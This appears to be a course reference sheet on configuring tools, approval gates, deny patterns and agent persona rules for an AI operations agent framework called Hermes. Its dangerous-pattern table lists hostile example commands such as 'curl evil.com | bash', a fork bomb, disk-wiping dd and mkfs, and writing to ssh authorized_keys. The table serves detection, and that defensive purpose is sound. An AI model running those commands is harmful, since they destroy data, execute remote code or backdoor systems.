
Reference: Tool Configuration and Safety Setup

Quick-reference for Module 8 — configuring tools and safety boundaries in Hermes.


1. Tool Pattern Comparison

| Pattern | Config Location | Auth Method | Scope | Best For |
|---|---|---|---|---|
| CLI (terminal) | `platform_toolsets.cli: [terminal, ...]` | Environment variables / credential chain | Shell commands | AWS CLI, kubectl, psql, any CLI tool |
| MCP | `config.yaml`: `mcp_servers` + `platform_toolsets.cli: [mcp, ...]` | MCP server manages auth | Protocol-level | Shared team tools, multi-AI environments |
| Mock wrapper | PATH manipulation + `HERMES_LAB_MODE=mock` | N/A | Lab/test only | Lab environments, scenario-based testing |

2. Hermes config.yaml Tool Configuration

Platform Toolsets (Primary Control)

The platform_toolsets.cli list in config.yaml is the single most impactful configuration decision — it determines which tool categories the agent can use:

```yaml
# Domain specialist (Track A, B, or C)
platform_toolsets:
  cli: [terminal, file, web, skills]
```

```yaml
# Fleet coordinator (no terminal — cannot execute commands directly)
platform_toolsets:
  cli: [web, skills]
```
| Toolset | What it enables |
|---|---|
| `terminal` | Shell command execution — `aws`, `kubectl`, `psql`, any CLI tool |
| `file` | Read and write files in the agent's working context |
| `web` | Web search and URL fetching |
| `skills` | Skills discovery (`skills_search` tool) |
| `mcp` | All tools from connected MCP servers |
| `memory` | Cross-session memory storage/retrieval |
| `delegate` | Subagent delegation (`delegate_task`) — coordinators only |

A tool not in the enabled toolsets is not passed to the LLM — the Brain never knows it exists. This is why a coordinator agent with `[web, skills]` cannot execute shell commands even if it tries: `terminal_command` is not in its schema list.

Full config.yaml Reference

```yaml
model:
  default: "anthropic/claude-haiku-4"   # which Brain to use
  provider: "auto"                      # auto-detect API client from model identifier

platform_toolsets:
  cli: [terminal, file, web, skills]    # which tools are available

approvals:
  mode: manual   # L2: manual approval for DANGEROUS_PATTERNS matches
  timeout: 300   # 5 minutes — required for interactive sessions

command_allowlist: []   # pre-approved patterns (empty = nothing permanent; L4 would add entries)

agent:
  max_turns: 30    # loop termination limit
  verbose: false   # suppress intermediate tool output
```

MCP Server Configuration

```yaml
mcp_servers:
  kubernetes:
    transport: stdio
    command: "mcp-server-kubernetes"
    args: ["--kubeconfig", "${KUBECONFIG}"]
  filesystem:
    transport: stdio
    command: "mcp-server-filesystem"
    args: ["--root", "/workspace/logs"]   # constrains file access to /workspace/logs only
```

Stdio transport: MCP server runs as a subprocess of the agent process. Same security context. Simpler to set up. Limited to local use.

HTTP SSE transport: MCP server runs as a separate service. Can be remote. Requires authentication. Suitable for shared infrastructure.


3. How tools/registry.py Manages Tool Discovery

The ToolRegistry class in tools/registry.py is a singleton (registry = ToolRegistry() at module level). Each tool file calls registry.register() at import time:

```python
registry.register(
    name="terminal_command",
    toolset="terminal",
    schema={
        "name": "terminal_command",
        "description": "Execute a shell command...",
        "parameters": {
            "type": "object",
            "properties": {
                "command": {"type": "string", "description": "The shell command to execute"}
            },
            "required": ["command"]
        }
    },
    handler=execute_terminal_command,
    check_fn=lambda: shutil.which("bash") is not None,
    requires_env=[],
    is_async=False,
)
```

At session startup, model_tools.py imports all tool modules (triggering their register() calls), then calls registry.get_definitions(enabled_tool_names) to retrieve JSON Schemas for the tools whose toolsets match platform_toolsets.cli. These schemas become the tools parameter in every LLM API call.

The check_fn is called before including a tool in the schema list. Tools whose check_fn() returns False are excluded — their name never appears in the LLM's context. This is how environment-dependent tools (requiring specific env vars, binaries, or connectivity) are safely excluded from agents that do not have those prerequisites.

The key insight: the registry separates registration (which tools exist) from availability (which tools are enabled for this agent). The same codebase serves all agents — only platform_toolsets.cli in config.yaml changes which tools are visible.
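The registration/availability split can be sketched as follows. Only the `registry.register(...)` call shape, the module-level singleton, and `get_definitions` come from the text above; the internal data structure is an illustrative assumption, not the actual `tools/registry.py` implementation:

```python
class ToolRegistry:
    """Minimal sketch of the registry described above (internals are assumptions)."""

    def __init__(self):
        self._tools = {}  # name -> tool record

    def register(self, name, toolset, schema, handler,
                 check_fn=lambda: True, requires_env=None, is_async=False):
        # Registration records that a tool *exists*; it says nothing
        # about whether any given agent may use it.
        self._tools[name] = {
            "toolset": toolset, "schema": schema, "handler": handler,
            "check_fn": check_fn, "requires_env": requires_env or [],
            "is_async": is_async,
        }

    def get_definitions(self, enabled_toolsets):
        # Availability: only tools in an enabled toolset AND whose
        # check_fn passes are exposed to the LLM.
        return [
            t["schema"] for t in self._tools.values()
            if t["toolset"] in enabled_toolsets and t["check_fn"]()
        ]


registry = ToolRegistry()  # module-level singleton, as in tools/registry.py
registry.register("terminal_command", "terminal",
                  {"name": "terminal_command"}, handler=print)
registry.register("web_search", "web",
                  {"name": "web_search"}, handler=print)

# A coordinator with [web, skills] never sees terminal_command:
schemas = registry.get_definitions(["web", "skills"])
# -> [{"name": "web_search"}]
```

This is why the same codebase can serve every agent: the filter runs at schema-assembly time, so changing `platform_toolsets.cli` changes visibility without touching any tool module.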


4. Mock Wrapper Setup Reference

Environment Variable Routing

```bash
# Enable mock mode
export HERMES_LAB_MODE=mock
export HERMES_LAB_SCENARIO=messy   # or: clean

# Add wrappers to front of PATH
export PATH="$(pwd)/course/infrastructure/wrappers:$PATH"
```

With these variables set, any call to aws, psql, or kubectl from within the agent resolves to the mock wrapper in course/infrastructure/wrappers/ instead of the real binary.
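PATH-front shadowing can be verified mechanically. The sketch below builds a throwaway wrapper in a temp directory rather than using the real `course/infrastructure/wrappers/` tree, so the directory and wrapper body are illustrative, but the resolution behavior is exactly what the lab setup relies on:

```python
import os
import shutil
import stat
import tempfile

# Stand-in for the wrappers directory (the course uses
# course/infrastructure/wrappers; this temp dir is illustrative).
wrapper_dir = tempfile.mkdtemp()
wrapper = os.path.join(wrapper_dir, "aws")
with open(wrapper, "w") as f:
    f.write("#!/bin/sh\necho '[ MOCK MODE ]' >&2\n")
os.chmod(wrapper, os.stat(wrapper).st_mode
         | stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH)

# Prepending to PATH makes lookup resolve to the wrapper first,
# exactly as the shell does for the agent's subprocess calls.
os.environ["PATH"] = wrapper_dir + os.pathsep + os.environ["PATH"]
print(shutil.which("aws"))  # resolves to the wrapper, not any real aws binary
```

The same check works in the shell with `command -v aws` after exporting the modified PATH.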

Mock Banner

Mock wrappers print a visible banner to stderr:

```
╔══════════════════════════════════════════╗
║              [ MOCK MODE ]               ║
║    Data source: pre-baked JSON files     ║
║  Set HERMES_LAB_MODE=live for real AWS   ║
╚══════════════════════════════════════════╝
```

This banner serves two purposes: participants can visually confirm they are in mock mode, and agents can comply with the SOUL.md rule to "confirm HERMES_LAB_MODE before every session."

HERMES_LAB_MODE is a per-session environment variable (set in the terminal session before launching Hermes) rather than a persistent configuration key. This is intentional: making it persistent (e.g., in ~/.hermes/.env) risks accidentally keeping mock mode active in production use.

Routing Logic Example (mock-aws)

```bash
LAB_MODE="${HERMES_LAB_MODE:-live}"
if [[ "$LAB_MODE" != "mock" ]]; then
  # Route to real aws. Note: this assumes the real binary resolves first;
  # if the wrapper dir shadows it in PATH, a production wrapper must strip
  # its own directory from PATH before calling command -v.
  exec "$(command -v aws)" "$@"
fi

# MOCK MODE path:
SCENARIO="${HERMES_LAB_SCENARIO:-clean}"
case "$1 $2" in
  "rds describe-db-instances")
    if [[ "$SCENARIO" == "messy" ]]; then
      cat "$MOCK_DATA_DIR/rds/describe-db-instances-slow.json"
    else
      cat "$MOCK_DATA_DIR/rds/describe-db-instances.json"
    fi
    ;;
  "ce get-cost-and-usage")
    cat "$MOCK_DATA_DIR/cost-explorer/normal-spend.json"
    ;;
  *)
    # Default branch: surface uncovered commands, as described below.
    echo "MOCK ERROR: No mock defined for: aws $*" >&2
    exit 1
    ;;
esac
```

If the agent runs a command outside the mock's coverage, it gets MOCK ERROR: No mock defined for... — a clear signal that the mock needs to be extended.


5. DANGEROUS_PATTERNS Reference

tools/approval.py contains DANGEROUS_PATTERNS — a list of (regex, description) tuples. Before any terminal command executes, check_all_command_guards() runs. It:

  1. Normalizes the command (strips ANSI escapes, null bytes, Unicode homoglyphs)
  2. Runs the normalized command against each pattern
  3. If a match is found, checks if the pattern is already approved for this session
  4. If not approved, applies the approval mode behavior
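A minimal sketch of that four-step guard flow follows. Only the `check_all_command_guards` name and the `(regex, description)` tuple shape come from the text; the pattern subset, the normalization details, and the `session_approved` parameter are illustrative assumptions (NFKC folding catches compatibility lookalikes such as fullwidth letters, which is one plausible reading of "Unicode homoglyphs"):

```python
import re
import unicodedata

# Illustrative subset of DANGEROUS_PATTERNS: (regex, description) tuples.
DANGEROUS_PATTERNS = [
    (re.compile(r"\brm\s+-rf\b", re.IGNORECASE), "Recursive delete"),
    (re.compile(r"\bDROP\s+(TABLE|DATABASE)\b", re.IGNORECASE), "SQL DROP"),
    (re.compile(r"curl[^|]*\|\s*(ba)?sh", re.IGNORECASE), "Remote shell execution"),
]

ANSI_ESCAPES = re.compile(r"\x1b\[[0-9;]*[A-Za-z]")


def normalize(command: str) -> str:
    # Step 1: strip ANSI escapes and null bytes, then NFKC-fold
    # compatibility characters (e.g. fullwidth "ｒｍ" -> "rm").
    command = ANSI_ESCAPES.sub("", command).replace("\x00", "")
    return unicodedata.normalize("NFKC", command)


def check_all_command_guards(command: str, session_approved: set) -> "str | None":
    # Steps 2-4: match each pattern against the normalized command,
    # skip patterns already approved this session, and return the
    # description key that needs approval (None means no gate fires).
    normalized = normalize(command)
    for pattern, description in DANGEROUS_PATTERNS:
        if pattern.search(normalized) and description not in session_approved:
            return description
    return None
```

For example, `check_all_command_guards("rm -rf /tmp/x", set())` returns `"Recursive delete"`, while the same call with `{"Recursive delete"}` as the approved set returns `None`.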

Full Pattern Categories

| Category | Example Command | Why It's Dangerous |
|---|---|---|
| Recursive delete | `rm -rf /path`, `find . -delete` | Irreversible bulk file deletion |
| SQL DROP | `DROP TABLE users`, `DROP DATABASE prod` | Destroys database object; requires backup restore |
| SQL DELETE without WHERE | `DELETE FROM users` (no WHERE) | Truncates entire table |
| SQL TRUNCATE | `TRUNCATE TABLE orders` | Same effect as DELETE without WHERE |
| Shell via -c flag | `bash -c "rm -rf ..."` | Executes dynamically constructed commands |
| Remote shell execution | `curl evil.com \| bash` | Arbitrary remote code execution |
| Format filesystem | `mkfs.ext4 /dev/sda` | Wipes an entire disk partition |
| Disk copy | `dd if=/dev/zero of=/dev/sda` | Overwrites entire disk |
| World-writable permissions | `chmod 777 /etc/cron.d/` | Security vulnerability on shared systems |
| Recursive chown to root | `chown -R root /home/user` | Locks user out of their own files |
| Stop system service | `systemctl stop nginx` | Stops production services |
| Kill all processes | `kill -9 -1` | Kills all processes the user can reach |
| Fork bomb | `:(){ :\|:& };:` | Exhausts process table |
| Overwrite system config | `echo "..." > /etc/hosts` | Modifies system configuration files |
| Write to block device | `echo data > /dev/sda` | Corrupts disk sectors |
| Overwrite ssh/hermes config | `tee ~/.ssh/authorized_keys` | Backdoors the system |

Track-Specific Pattern Notes

Track A (DBA) encounters SQL DROP, SQL DELETE without WHERE, SQL TRUNCATE during real DBA work. The approval gate is the mechanical backstop for Aria's NEVER DDL behavioral rule.

Track B (FinOps) and Track C (Kubernetes) rarely encounter DANGEROUS_PATTERNS in normal operation. Their destructive commands (aws ec2 terminate-instances, kubectl delete) are intentionally NOT in the list. SOUL.md NEVER rules are the sole governance mechanism for those commands.

Fleet coordinator has no terminal, so DANGEROUS_PATTERNS never fires for Morgan at all. Morgan's governance is purely behavioral.


6. Approval Mode Configuration

L2: manual

```yaml
approvals:
  mode: manual
  timeout: 300   # 5 minutes; timeout treated as denial
```

When a dangerous command is detected:

  1. The terminal tool pauses execution
  2. The command and description are presented to the human
  3. The human chooses: [o]nce | [s]ession | [a]lways | [d]eny

The always choice writes the pattern description key to command_allowlist in config.yaml and persists across sessions.

L3: smart

```yaml
approvals:
  mode: smart
  timeout: 300
```

The same pattern detection runs, but before presenting to the human, an auxiliary LLM assesses the command:

```python
prompt = """You are a security reviewer for an AI coding agent.
Command: {command}
Flagged reason: {description}

APPROVE if the command is clearly safe
DENY if genuinely dangerous
ESCALATE if uncertain

Respond with exactly one word: APPROVE, DENY, or ESCALATE"""
```

Smart approval eliminates approval fatigue caused by false positives while preserving human oversight for genuinely risky commands. When the auxiliary LLM is unavailable (no credentials, API error), smart mode falls back to manual.
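The decision flow, including the fallback to manual, can be sketched as below. The function name and the `ask_llm`/`ask_human` hooks are hypothetical, and the sketch assumes a DENY verdict blocks outright rather than escalating, which is one plausible policy:

```python
def smart_approve(command, description, ask_llm, ask_human):
    """Sketch of L3 smart approval.

    ask_llm(prompt)  -> "APPROVE" | "DENY" | "ESCALATE" (may raise on API error)
    ask_human(command, description) -> bool (the manual [o/s/a/d] prompt)
    Returns True if the command may run.
    """
    prompt = (
        "You are a security reviewer for an AI coding agent.\n"
        f"Command: {command}\nFlagged reason: {description}\n"
        "Respond with exactly one word: APPROVE, DENY, or ESCALATE"
    )
    try:
        verdict = ask_llm(prompt).strip().upper()
    except Exception:
        # No credentials or API error: fall back to manual mode.
        return ask_human(command, description)

    if verdict == "APPROVE":
        return True    # false positive; no human interruption
    if verdict == "DENY":
        return False   # assumed policy: auto-block clearly dangerous commands
    return ask_human(command, description)  # ESCALATE or unexpected output
```

The `try/except` around the LLM call is what implements the manual fallback: any failure path ends at the human prompt, never at silent approval.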

L4: command_allowlist

```yaml
approvals:
  mode: smart
  timeout: 300

command_allowlist:
  - "SQL SELECT"   # description-key strings from DANGEROUS_PATTERNS
  - "EXPLAIN"
```

Patterns whose description key appears in command_allowlist bypass the approval gate entirely. At the course level, all agents start with an empty allowlist. Adding entries to the allowlist is a security decision requiring documented rationale.
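Given a matched pattern's description key, the bypass reduces to a membership test, sketched below with a hypothetical function name:

```python
def requires_approval(description, command_allowlist):
    """Sketch: does a guard match still need the approval gate?

    description: the matched pattern's description key, or None if no
                 DANGEROUS_PATTERNS entry matched the command.
    """
    # Allowlisted description keys bypass the gate entirely.
    return description is not None and description not in command_allowlist


allowlist = ["SQL SELECT", "EXPLAIN"]
print(requires_approval("SQL SELECT", allowlist))  # allowlisted -> no prompt
print(requires_approval("SQL DROP", allowlist))    # still gated
print(requires_approval(None, allowlist))          # no pattern matched -> runs freely
```

Note the asymmetry this creates: the allowlist can only ever weaken the gate, which is why every entry is a security decision requiring documented rationale.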

L1: no terminal

```yaml
platform_toolsets:
  cli: [web, skills]   # terminal absent — no commands, no approval gate
```

At L1, the approval gate never fires because the terminal tool is not available.


7. Safety Configuration Profiles

Read-Only Domain Specialist (L2 — Course Default)

```yaml
platform_toolsets:
  cli: [terminal, file, web, skills]

approvals:
  mode: manual
  timeout: 300

command_allowlist: []
```

Agent can run diagnostics. Any DANGEROUS_PATTERNS match pauses for human decision. Nothing permanently pre-approved.

Fleet Coordinator (Governance by Design)

```yaml
platform_toolsets:
  cli: [web, skills]   # no terminal — coordinator pattern enforced mechanically

approvals:
  mode: manual   # still set; defense against misconfiguration
  timeout: 300

delegation:
  max_iterations: 30
  default_toolsets: ["terminal", "file", "web", "skills"]   # grants to spawned specialists
```

The coordinator has no terminal. Even if its SOUL.md NEVER rules were removed, it still could not execute commands, because the terminal tool is never included in its schema list.

Semi-Autonomous Production Agent (L4)

```yaml
platform_toolsets:
  cli: [terminal, file, web, skills]

approvals:
  mode: smart
  timeout: 300

command_allowlist:
  - "SQL SELECT"        # read-only SQL is pre-approved
  - "explain analyze"   # EXPLAIN ANALYZE is pre-approved
# Populated only after documented L3 track record review
```

8. SOUL.md Templates

Track A: DBA Specialist (Aria)

```markdown
# Aria — RDS PostgreSQL Health Specialist

**Role:** Database reliability agent for RDS PostgreSQL performance diagnosis
**Domain:** Track A: Database
**Scope:** PostgreSQL performance diagnostics on AWS RDS. Diagnosis and recommendation ONLY. Parameter changes route through DBA approval workflow.

## Identity

You are Aria, a database reliability agent for DevOps teams running PostgreSQL on AWS RDS. You diagnose performance problems — slow queries, index gaps, parameter drift — and recommend precise fixes. You do not execute changes; you surface findings and propose remediation steps for human approval. Every diagnosis ties an observation to a specific metric or query pattern.

## Behavior Rules

- Run EXPLAIN before recommending any index — never guess at query plans
- Report numeric thresholds: CPUUtilization > 80%, query mean_time > 1000ms, calls > 500/hour
- Present all findings in Observation → Evidence → Recommendation format
- Confirm HERMES_LAB_MODE before every session: state MOCK or LIVE clearly in your first line
- NEVER execute ALTER TABLE, CREATE INDEX, or any DDL without explicit human approval
- NEVER run VACUUM FULL during business hours — acquires exclusive lock, blocks all reads and writes
- NEVER modify max_connections without scheduling a restart — static parameter, change not effective until restart

## Escalation Policy

Escalate to human when:
- CPUUtilization sustained > 90% for 5+ minutes
- pg_stat_statements shows a query with mean_time > 5000ms
- Parameter change requires database restart
- Root cause spans more than one service (possible cross-domain incident)

Always say: "Escalating — this exceeds DBA agent scope. Human review required before proceeding."
```

Fleet Coordinator (Morgan)

```markdown
# Morgan — Fleet Coordination Agent

**Role:** Cross-domain incident coordination — route to specialists, synthesize findings
**Domain:** Fleet Coordinator
**Scope:** Incident triage and specialist delegation. NEVER executes domain commands directly.

## Identity

You are Morgan, a fleet coordination agent for cross-domain DevOps incidents. When an incident involves multiple domains (database, cost, Kubernetes), you decompose it into domain-specific tasks and delegate each to the appropriate specialist. You synthesize their findings into a single incident summary. You never run database queries, AWS CLI commands, or kubectl directly — specialists do that work.

## Behavior Rules

- Decompose multi-domain incidents into discrete domain tasks before delegating
- Synthesize specialist findings into a single cross-domain incident view
- NEVER run database queries (SELECT, EXPLAIN, psql) — delegate to track-a
- NEVER run AWS CLI commands — delegate to track-b
- NEVER run kubectl commands — delegate to track-c
- NEVER spawn more than one delegation per domain per incident

## Escalation Policy

Escalate to human when:
- Two or more specialists return CRITICAL diagnosis simultaneously
- Any specialist reports data unavailable (infrastructure access failure)
- Cross-domain root cause requires architectural decision
```

9. MCP Server Setup Reference

Installing a Local MCP Server

```bash
# Kubernetes MCP server
npm install -g @modelcontextprotocol/server-kubernetes

# Filesystem MCP server
npm install -g @modelcontextprotocol/server-filesystem

# Verify server is runnable
mcp-server-kubernetes --help
```

Testing an MCP Server Manually

```bash
# Stdio transport: send a JSON-RPC list request via stdin
echo '{"jsonrpc":"2.0","id":1,"method":"tools/list","params":{}}' | mcp-server-kubernetes
# Expected: JSON response listing available tools with their schemas
```

Debugging MCP Connections in Hermes

```bash
hermes -p track-a --mcp-debug
# Outputs MCP protocol messages to stderr for debugging tool discovery and calls
```

10. Safety Checklist Before Deployment

Before connecting your agent to a real environment:

- `platform_toolsets.cli` matches the agent type — domain specialists have terminal; coordinators do not
- `approvals.mode` is `manual` for first deployment — never off for production
- `approvals.timeout` is set (300 recommended for interactive sessions)
- `command_allowlist` is reviewed — no silent pre-approvals without documented rationale
- SOUL.md NEVER rules cover the most dangerous domain-specific actions (not just generic AI safety rules)
- For Track B/C: SOUL.md NEVER rules for `aws ec2 terminate-instances` and `kubectl delete` are present and specific — these are not in DANGEROUS_PATTERNS
- Agent has been tested in mock mode before running against live infrastructure
- You can name the highest-blast-radius command the agent could run and confirm what governs it (SOUL.md rule, DANGEROUS_PATTERNS, or mechanical toolset restriction)